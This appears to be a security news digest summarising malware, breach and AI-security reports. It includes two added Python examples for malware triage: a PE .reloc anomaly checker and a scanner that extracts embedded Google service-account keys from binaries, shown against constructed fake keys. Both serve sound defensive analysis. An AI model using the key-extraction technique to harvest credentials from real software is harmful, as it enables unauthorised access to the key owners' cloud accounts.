        "Threat hunting is meant to uncover malicious activity before it becomes an incident. In reality, it can easily turn into a long expedition through noisy logs, vague indicators, and detection rules that lack the context needed to separate real risk from routine activity. The issue is rarely the analyst’s skill. The real bottleneck is intelligence quality. A standalone IP address, domain, or hash may be useful for blocking, but it does not explain the campaign behind it, the behaviors it leaves on endpoints, or the infrastructure likely to appear next."
        https://hackread.com/threat-hunting-alerts-finding-activity-detection-misses/
      • Lost In Relocation: Analysis Of a New Loader Distributing CASTLESTEALER
        "A previously undocumented Windows loader tracked as OXLOADER is delivering the CASTLESTEALER infostealer via malicious Google Ads, with low detection rates across static engines and sandbox detonations. The loader uses several obfuscation layers (control-flow flattening, opaque predicates, mixed Boolean-Arithmetic), self-modifying decryption stubs, and abuses the Windows .reloc section to stage shellcode. Elastic Security Labs identified OXLOADER in an active campaign targeting one of our customers; CIS-region and Russian-language exclusions point to a financially motivated, Russian-speaking threat actor. We have found no prior public reporting on this family."
        https://www.elastic.co/security-labs/oxloader-malware-loader-infostealer
        https://thehackernews.com/2026/06/new-oxloader-loader-uses-malicious.html
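        Added example, not Elastic's code: a static triage check in Python for the .reloc abuse the report describes. It parses the PE section table and the base relocation data directory by hand and flags a .reloc section that is marked executable, that holds far more bytes than the relocation directory accounts for, or whose contents have the entropy of encrypted data. build_sample_pe, benign_reloc_table and the 16 KiB pseudo-random blob are constructed fixtures (header-only images, not loadable binaries), and the thresholds are assumptions.

```python
import hashlib
import math
import struct

IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE      = 0x02000000
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000
BASERELOC_DIR = 5   # IMAGE_DIRECTORY_ENTRY_BASERELOC index in the data directory


def shannon_entropy(data):
    """Bits per byte: near 8.0 for encrypted data, well below 7 for a real relocation table."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(pe):
    """Return (basereloc_rva, basereloc_size, sections) from raw PE32/PE32+ bytes."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    nsec = struct.unpack_from("<H", pe, fh + 2)[0]
    opt_size = struct.unpack_from("<H", pe, fh + 16)[0]
    opt = fh + 20                                       # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd = opt + (112 if magic == 0x20B else 96)          # DataDirectory[] offset (PE32+ / PE32)
    reloc_rva, reloc_size = struct.unpack_from("<II", pe, dd + 8 * BASERELOC_DIR)
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawsize": rawsize, "chars": chars,
                         "data": pe[rawptr:rawptr + rawsize]})
    return reloc_rva, reloc_size, sections


def check_reloc(pe):
    """Flag a .reloc section that looks like a payload container rather than a fixup table."""
    reloc_rva, reloc_size, sections = parse_pe(pe)
    findings = []
    for s in sections:
        if s["name"] != ".reloc":
            continue
        if s["chars"] & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE):
            findings.append("executable: .reloc is marked executable/code")
        if s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append("writable: .reloc is marked writable")
        if not (s["va"] <= reloc_rva < s["va"] + max(s["vsize"], s["rawsize"])):
            findings.append("directory: base relocation directory does not point into .reloc")
        if s["rawsize"] > reloc_size + 0x1000:         # allow one page of alignment slack
            findings.append(f"oversized: .reloc holds {s['rawsize']:#x} bytes but the "
                            f"relocation directory covers only {reloc_size:#x}")
        ent = shannon_entropy(s["data"])
        if ent > 7.0:
            findings.append(f"entropy: {ent:.2f} bits/byte, consistent with encrypted shellcode")
    return findings


def build_sample_pe(reloc_data, reloc_dir_size, reloc_chars):
    """Constructed minimal PE32+ with .text and .reloc; fields the parser ignores are zero."""
    def pad(b):
        return b + b"\0" * (-len(b) % 0x200)            # 0x200 file alignment
    text, reloc = pad(b"\xC3" * 16), pad(reloc_data)
    dirs = [(0, 0)] * 16
    dirs[BASERELOC_DIR] = (0x2000, reloc_dir_size)
    opt = struct.pack("<H", 0x20B) + b"\0" * 106 + struct.pack("<I", 16)  # Magic .. NumberOfRvaAndSizes
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    secs = struct.pack("<8sIIIIIIHHI", b".text", 16, 0x1000, len(text), 0x200, 0, 0, 0, 0,
                       IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    secs += struct.pack("<8sIIIIIIHHI", b".reloc", len(reloc_data), 0x2000, len(reloc),
                        0x200 + len(text), 0, 0, 0, 0, reloc_chars)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                   # e_lfanew = 0x40
    fileh = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, len(opt), 0x22)
    return pad(dos + b"PE\0\0" + fileh + opt + secs) + text + reloc


def benign_reloc_table(entries=100):
    """One IMAGE_BASE_RELOCATION block of DIR64 (type 0xA) fixups at an 8-byte stride."""
    fixups = b"".join(struct.pack("<H", 0xA000 | (8 * i)) for i in range(entries))
    return struct.pack("<II", 0x1000, 8 + len(fixups)) + fixups


def run_example():
    table = benign_reloc_table()
    benign = build_sample_pe(table, len(table),
                             IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_DISCARDABLE)
    # constructed stand-in for an encrypted shellcode blob: 16 KiB of deterministic pseudo-random bytes
    blob = b"".join(hashlib.sha256(b"constructed-%d" % i).digest() for i in range(512))
    staged = build_sample_pe(blob, 0x100,
                             IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE)
    return check_reloc(benign), check_reloc(staged)


if __name__ == "__main__":
    for label, findings in zip(("benign", "staged"), run_example()):
        print(label, findings or "clean")
```

        A genuine relocation table is a run of 16-bit entries whose high nibble is nearly always 0xA (DIR64) or 0x3 (HIGHLOW), so its entropy stays low and its size tracks the directory; file-alignment padding is normally the only reason for the section to be larger than the directory, which is what the one-page allowance covers.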
      • Gizmodo Readers Hit With ClickFix Malware Prompts After Account Compromise
        "Veteran tech website Gizmodo confirmed a compromise on Saturday after readers reported ClickFix malware prompts appearing on article pages. Users posted screenshots of fake CAPTCHA windows appearing on Gizmodo's site. The attack aims to fool users into running malicious code via their terminals. According to Proofpoint threat researcher Tommy M, the attack was seemingly launched by an affiliate of ErrTraffic, a ClickFix-as-a-service program that allows attackers to deliver whichever malware they choose."
        https://www.theregister.com/security/2026/06/22/gizmodo-readers-hit-with-clickfix-malware-prompts-after-account-compromise/5259226
      • Analyzing SHEET#CREEP: SHEETCREEP Is Up Again With Different Config Obfuscation
        "The Securonix Threat Research team has identified an ongoing espionage campaign, tracked as SHEETCREEP, where threat actors deliver a C# remote access trojan through a diplomatic-themed ISO phishing lure. Building upon the initial discovery and excellent research of the SHEETCREEP malware family by Zscaler’s ThreatLabz, we observed that the RAT abuses the Google Sheets API as its command-and-control (C2) channel, authenticating via an embedded GCP service account private key and using individual spreadsheet tabs per victim for bidirectional communication. Our team successfully extracted the embedded credentials, authenticated to the live C2 spreadsheet, and identified 91 active victim tabs including a high-confidence target located in Pakistan."
        https://www.securonix.com/blog/sheetcreep-evolved-google-sheets-rat
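        Added example, not Securonix's or Zscaler's code: the credential-extraction step, in Python, run over a constructed sample. A GCP service-account key is a flat JSON document with fixed fields (type, project_id, private_key_id, private_key, client_email), so a scanner can pull it out of a dropped binary, plain or base64-encoded, and recover the identity that names the operator's Google Cloud project. The sample buffer, the project names and the placeholder private key are constructed; no real key material is involved.

```python
import base64
import json
import re

# Fields every Google service-account key file carries.
SA_FIELDS = ("type", "project_id", "private_key_id", "private_key", "client_email")

# A flat JSON object (no nested braces) that declares itself a service account.
_SA_JSON = re.compile(rb'\{[^{}]*"type"\s*:\s*"service_account"[^{}]*\}')
# Base64 runs long enough to hold an encoded copy of such a document.
_B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")


def _parse_candidate(blob):
    """Validate a JSON candidate and return the identifying fields, or None."""
    try:
        obj = json.loads(blob.decode("utf-8", "replace"))
    except ValueError:
        return None
    if not isinstance(obj, dict) or any(f not in obj for f in SA_FIELDS):
        return None
    if obj["type"] != "service_account":
        return None
    if not str(obj["private_key"]).startswith("-----BEGIN PRIVATE KEY-----"):
        return None
    if not str(obj["client_email"]).endswith(".iam.gserviceaccount.com"):
        return None
    return {"project_id": obj["project_id"], "client_email": obj["client_email"],
            "private_key_id": obj["private_key_id"]}


def extract_service_account_keys(data):
    """Find embedded service-account keys in a byte buffer, plain or base64-wrapped."""
    found = []
    for m in _SA_JSON.finditer(data):
        rec = _parse_candidate(m.group(0))
        if rec:
            found.append({**rec, "encoding": "plain", "offset": m.start()})
    for m in _B64_RUN.finditer(data):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except ValueError:          # binascii.Error is a ValueError: not real base64
            continue
        for inner in _SA_JSON.finditer(decoded):
            rec = _parse_candidate(inner.group(0))
            if rec:
                found.append({**rec, "encoding": "base64", "offset": m.start()})
    return found


def _fake_pem():
    """Constructed placeholder in PEM shape; deliberately not a parseable key."""
    body = "\n".join(["MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC" + "FAKE" * 4] * 4)
    return "-----BEGIN PRIVATE KEY-----\n" + body + "\n-----END PRIVATE KEY-----\n"


_FAKE_KEY = {
    "type": "service_account",
    "project_id": "sheetc2-example",
    "private_key_id": "0123456789abcdef0123456789abcdef01234567",
    "private_key": _fake_pem(),
    "client_email": "c2-bot@sheetc2-example.iam.gserviceaccount.com",
    "client_id": "100000000000000000000",
    "token_uri": "https://oauth2.googleapis.com/token",
}
_FAKE_KEY_2 = dict(_FAKE_KEY, project_id="sheetc2-example-2",
                   private_key_id="fedcba9876543210fedcba9876543210fedcba98",
                   client_email="stage2@sheetc2-example-2.iam.gserviceaccount.com")

# Constructed sample "binary": header junk, a stray brace pair, one plain key and one
# base64-wrapped key separated by non-base64 bytes.
SAMPLE = (b"MZ\x90\x00" + b"\x00" * 64 + b"{not json}"
          + json.dumps(_FAKE_KEY).encode() + b"\x00" * 32
          + base64.b64encode(json.dumps(_FAKE_KEY_2).encode()) + b"\xff" * 16)


def run_example():
    return extract_service_account_keys(SAMPLE)


if __name__ == "__main__":
    for hit in run_example():
        print(f"{hit['encoding']:6s} @{hit['offset']:#06x} {hit['client_email']} "
              f"(project {hit['project_id']}, key id {hit['private_key_id'][:8]}...)")
```

        The client_email and project_id identify the operator's Google Cloud project for an abuse report and for blocking at the proxy, and the private_key_id lets later samples be tied to the same credential; using the key to log into the C2 spreadsheet, as the researchers did, goes beyond passive analysis, and the extracted identifiers are already enough for blocking and reporting.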
      • Ababil Of Minab Exposed: LA Metro SCADA Backups And Israeli Victim Data Left Open On An Iranian Staging Server
        "Ababil of Minab is a pro-Iranian threat actor that surfaced in late March 2026, claiming destructive intrusions against targets in the United States, Israel, Saudi Arabia, and Turkey, including a confirmed breach of the Los Angeles County Metropolitan Transportation Authority. On May 26, 2026, Gambit Security published a technical report documenting SQL Server deletion, VM partition wipes, Veeam backup destruction, and file system damage across four victim environments, but deliberately withheld the identities of additional targets."
        https://hunt.io/blog/ababil-of-minab-iranian-hackers-exposed-la-metro-breach-open-directory

      Breaches/Hacks/Leaks

      • JaredFromSubway MEV Bot Hacked In $15 Million Crypto Theft
        "The JaredFromSubway Ethereum MEV (Maximal Extractable Value) bot suffered a $15 million loss after an attacker manipulated the opportunity-detection logic by creating fake cryptocurrency trading opportunities. The drain was detected on Saturday by blockchain security firm Blockaid, and today, JaredFromSubway confirmed that the attacker used fake pools and tokens to trick the bot into approving helper contracts. According to Blockaid, the attacker deployed contracts designed to appear as profitable MEV opportunities to JaredFromSubway's automated execution system."
        https://www.bleepingcomputer.com/news/security/jaredfromsubway-mev-bot-hacked-in-15-million-crypto-theft/
      • Hundreds Of AI-Powered iOS Apps Found Exposing Credentials
        "Mobile app developers are packing AI features into everything from writing assistants to productivity tools and lifestyle apps. New research shows that securing access to those services remains a challenge. Researchers from Wake Forest University analyzed 444 iOS applications with LLM features and found 282 that exposed exploitable credentials or backend access mechanisms. The affected apps covered 13 categories, including productivity, entertainment, lifestyle, education, utilities, and health and fitness. LLM-powered applications reached 17 billion downloads in 2025 and accounted for 13% of all mobile app downloads."
        https://www.helpnetsecurity.com/2026/06/22/llm-api-credential-leakage-ios-apps/
        https://arxiv.org/pdf/2606.12212
      • Suspected Cyberattack Triggers False Emergency Alerts Across Parts Of Brazil
        "Brazil suspended its mobile phone emergency alert system after a suspected cyberattack triggered false warnings on phones across several states. The incident occurred early Saturday when at least a dozen unauthorized alerts were sent through Brazil's Civil Defense Alert system, a platform designed to warn residents about imminent threats such as floods, landslides and other natural disasters."
        https://therecord.media/suspected-cyberattack-triggers-false-emergency-alerts-brazil
        https://www.theregister.com/security/2026/06/22/brazil-begins-investigating-emergency-alert-system-breach/5259421
      • Canadian Utility Fesses Up To Data Breach, But Key Details Remain Off-Grid
        "A Canadian power utility says customer data may have walked out the door during a security incident, but isn't yet saying whether the intruders got anywhere near the systems responsible for keeping the lights on. London Hydro, which distributes electricity to more than 160,000 customers in and around London, Ontario, said on Saturday that it is investigating a data security incident that 'may have impacted a portion of personal information on some accounts' and has started notifying affected customers."
        https://www.theregister.com/security/2026/06/22/canadian-utility-fesses-up-to-data-breach-but-key-details-remain-off-grid/5259309

      General News

      • Who Pays When You Gate Cyber-Capable AI Models?
        "In this interview with Help Net Security, Jaya Baloo, COO & CISO at Aisle, examines the debate over restricting access to cyber-capable AI models. She lays out the strongest argument for gating these tools, then explains where it breaks down for security teams who depend on the same capabilities for defense. Baloo argues that policymakers misread how attackers and defenders operate, that open-weight models cut both ways, and that limiting access can widen the gap between well-resourced organizations and everyone else."
        https://www.helpnetsecurity.com/2026/06/22/jaya-baloo-aisle-gating-cyber-capable-ai-models/
      • Encrypted DNS Still Tells An Eavesdropper Where To Look
        "Encrypted DNS runs across much of the Internet. DNS over TLS, HTTPS, and QUIC keep the contents of a query away from anyone watching a network link. The encryption covers the message inside each packet. The packet still carries plaintext headers, and those values mark a flow as DNS. A new study measures this gap for the Internet of Things and offers a way to close part of it."
        https://www.helpnetsecurity.com/2026/06/22/research-encrypted-dns-privacy/
        https://arxiv.org/pdf/2606.10097
      • What The Latest ShinyHunters Breaches Reveal About Modern Cyberattacks
        "The latest wave of breaches attributed to the ShinyHunters cybercrime collective (e.g., University of Nottingham, DentaQuest, 7-Eleven, Medtronic, and Wynn Resorts), reinforces a hard truth security leaders can no longer ignore: attackers are increasingly bypassing traditional perimeter defenses and targeting identities, authentication workflows, SaaS integrations, and trusted access paths instead of exploiting software vulnerabilities directly. Over the past several months, ShinyHunters has been linked to attacks involving Salesforce environments, Snowflake customers, SaaS integrations, and identity platforms such as Okta. Researchers and incident responders have consistently observed the same pattern: stolen credentials, compromised OAuth tokens, social engineering, vishing, and abuse of legitimate access privileges."
        https://www.securityweek.com/what-the-latest-shinyhunters-breaches-reveal-about-modern-cyberattacks/
      • Stop Your Legacy Infrastructure From Hijacking Your AI Agents
        "Earlier this month, I spoke at the Gartner Security & Risk Management Summit about a blind spot most security programs are still not accounting for - how attackers are circumventing AI security programs by using legacy infrastructure to hijack AI agents. AI adoption is moving faster than security programs can account for. Roughly 71% of organizations are piloting AI agents across their enterprise applications, and 31% have already moved them into production workflows."
        https://thehackernews.com/2026/06/stop-your-legacy-infrastructure-from.html
      • Canada’s Spy Agency Used First-Of-Its-Kind Warrant To Clean Botnet-Infected Devices
        "Canada's spy service got a judge's permission to reach into infected servers, home routers, and IoT gear sitting on Canadian soil and neutralize two foreign-run botnets. The Federal Court released a public version of the ruling on June 15. It is the first time the Canadian Security Intelligence Service has used its threat reduction warrant powers this way. The warrant let CSIS alter, degrade, and destroy botnet data on the infected machines and cut the devices loose from the networks."
        https://thehackernews.com/2026/06/canadas-spy-agency-used-first-of-its.html
        https://www.fct-cf.ca/en/pages/media/news-bulletins/file-c-6-24
      • Intel Agencies: Frontier AI Models Will Reshape Cybersecurity Faster Than Expected
        "Intelligence agencies for the United States, Canada, UK, Australia and New Zealand are warning that advanced AI models capable of wreaking havoc in the cyber domain are “months away” from being publicly available. In a joint statement, the Five Eyes alliance say they expect the kind of advanced hacking capabilities provided by frontier models like Anthropic’s Fable 5 and OpenAI’s Daybreak to become broadly available to the public within the year, despite efforts by AI companies to withhold them or restrict their access."
        https://cyberscoop.com/five-eyes-alliance-say-advanced-ai-hacking-models-months-away/

      References

      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT
    • Google adds Android developer identity verification to reduce the risk of installing malicious apps

      Follow the news on the webboard or on Facebook NCSA Thailand

      Posted in Cyber Security News
      NCSA_THAICERT
    • Salesforce cuts off the Klue integration after OAuth token theft affecting some customer data

      Posted in Cyber Security News
      NCSA_THAICERT
    • AryStinger botnet malware found hijacking more than 4,000 older D-Link routers to use as a base for cyber-attack operations

      Posted in Cyber Security News
      NCSA_THAICERT